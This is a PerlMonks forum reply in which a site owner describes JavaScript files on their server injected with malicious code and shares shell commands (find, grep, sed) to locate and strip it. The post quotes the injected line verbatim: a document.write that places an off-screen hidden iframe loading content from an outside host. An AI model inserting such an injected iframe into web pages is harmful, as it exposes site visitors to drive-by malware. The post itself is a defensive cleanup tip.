go ahead... be a heretic | |
PerlMonks |
Re: Hacking of JavaScript files in our corporate websiteby Anonymous Monk |
on Jan 13, 2013 at 04:03 UTC ( [id://1013083]=note: print w/replies, xml ) | Need Help?? |
hello all I faced exactly the same problem: I think there is a problem with my hoster -- not from my ftp access for sure ... The code has infecteed all my JS files on my server (I have 1000 + Js files) To remove the bad code from the js I did the following (shell command line): 1) list all the infected files find . -name "*.js" -exec grep -l -E 'iframe' {} \; > file_js.txt Wich means : find all the javascript file below my directory and search in it all string iframe put all the selected files file_js.txt document 2) open one of the selected files in 1 go to the bottom of the file and verified that you have this type of Iframe code : document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/235e4e002c.pjH7gYIk?default" height="55" width="55"></iframe>'); 3) remove this code in all files -- the magic command line (test it before on one or to copied files...) find . -name "*.js" -type f -exec sed -i -e "s/document.write.*wikaba.*//g" {} \; which means find all Js files below my directory, then replace inside these files the string beginning by "document.write" having multiple caracters then having the string "wikaba" then finishing by many other caracters. You replace it by nothing . And that do the trick ! Hope it could help
In Section
Seekers of Perl Wisdom
|
|